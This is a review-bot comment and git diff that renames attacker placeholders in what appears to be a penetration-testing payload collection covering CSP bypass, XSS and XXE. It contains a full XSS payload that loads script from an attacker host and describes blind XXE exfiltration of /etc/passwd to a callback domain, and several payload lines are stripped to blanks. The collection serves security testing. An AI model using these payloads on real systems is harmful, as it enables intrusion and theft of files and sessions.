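Review bot: In the `uwsgi.ini` hunk, `[ATTACKER.DOMAIN.TLD]` is the wrong placeholder for the `data://` and `fd://` lines: the comments directly above them say those read from binary appended data and from a file descriptor, so neither takes a domain, and only the `http://` line is a callback. The CONTRIBUTING rule changed in this same commit reserves the domain placeholder for callback domains, so the other two should keep a neutral, value-shaped placeholder, e.g. `bar = @(data://[DATA_OFFSET])` and `content = @(fd://[FILE_DESCRIPTOR])` (placeholder names illustrative; what each scheme expects should be checked against the uWSGI docs).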
@@ -69,7 +69,7 @@ Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-yo
 **Payload**:
 ```js
-d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
+d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[ATTACKER.DOMAIN.TLD]";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
 ```
 Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
@@ -126,13 +126,13 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
 - Inject a base tag.
 ```html
-
+
 ```
 - Host your custom js file at the same path that one of the website's script.
 ```ps1
- http://www.attacker.com/PATH.js
+ http://[ATTACKER.DOMAIN.TLD]/PATH.js
 ```
 ## Bypass CSP header sent by PHP
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 94fb730..84f216e 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -84,7 +84,7 @@ fclose($fp);
 ```html
 ```
-References:
+Additional reading:
 - [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain)
 - [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c)
@@ -401,7 +401,7 @@ SVG 1.x (xlink:href)
 ```xml
-
+
 ```
@@ -411,7 +411,7 @@ SVG 1.x (xlink:href)
 ```xml
-
+
 ```
@@ -470,7 +470,7 @@ div {
-">
-
+">
+">
+
 ```
 ### Other Blind XSS tools
@@ -530,7 +530,7 @@ You can use a [data grabber for XSS](#data-grabber) and a one-line HTTP server t
 Eg. payload
 ```html
-
+
 ```
 Eg. one-line HTTP server:
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 4598997..b4870b2 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -302,7 +302,7 @@ Payloads from [infosec-au/xxe-windows.md](https://gist.github.com/infosec-au/2c6
 ```xml
+
 %ext;
 ]>
@@ -343,29 +343,29 @@ Sometimes you won't have a result outputted in the page but you can still extrac
 ### Basic Blind XXE
-The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
+The easiest way to test for a blind XXE is to try to load a remote resource such as a callback endpoint controlled by the tester.
 ```xml
 %ext;
+ %ext;
 ]>
 ```
 ```xml
-]>
+]>
 &test;
 ```
-Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
+Send the content of `/etc/passwd` to `http://[ATTACKER.DOMAIN.TLD]`, you may receive only the first line.
 ```xml
-
+
 ] >
 &callhome;
@@ -377,12 +377,12 @@ Send the content of `/etc/passwd` to "www.malicious.com", you may receive only t
 ```xml
-
+
 &send;
-File stored on http://publicServer.com/parameterEntity_oob.dtd
+File stored on http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd
-">
+">
 %all;
 ```
@@ -392,15 +392,15 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
-
+
 %sp;
 %param1;
 ]>
 &exfil;
-File stored on http://127.0.0.1/dtd.xml
+File stored on http://10.10.10.10/dtd.xml
-">
+">
 ```
 ### XXE OOB with Apache Karaf
@@ -412,7 +412,7 @@ CVE-2018-11788 affecting versions:
 ```xml
- %dtd;]
+ %dtd;]
@@ -500,7 +500,7 @@ _xxe.svg_:
-
+
 %sp;
 %param1;
 ]>
@@ -522,7 +522,7 @@ _xxe.xml_:
 ```xml
-">
+">
 ```
 ### XXE Inside SOAP
@@ -530,7 +530,7 @@ _xxe.xml_:
 ```xml
- %dtd;]>]]>
+ %dtd;]>]]>
 ```
@@ -597,7 +597,7 @@ Add your blind XXE payload inside `xl/workbook.xml`.
 ```xml
-%asd;%c;]>
+%asd;%c;]>
 &rrr;
 ```
@@ -606,7 +606,7 @@ Alternatively, add your payload in `xl/sharedStrings.xml`:
 ```xml
-%asd;%c;]>
+%asd;%c;]>
 &rrr;testA2testA3testA4testA5testB1testB2testB3testB4testB5
 ```
@@ -618,7 +618,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
 ```xml
-">
+">
 ```
 Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv):
@@ -637,7 +637,7 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
-'>
+'>
 %param1;
 %external;
 ```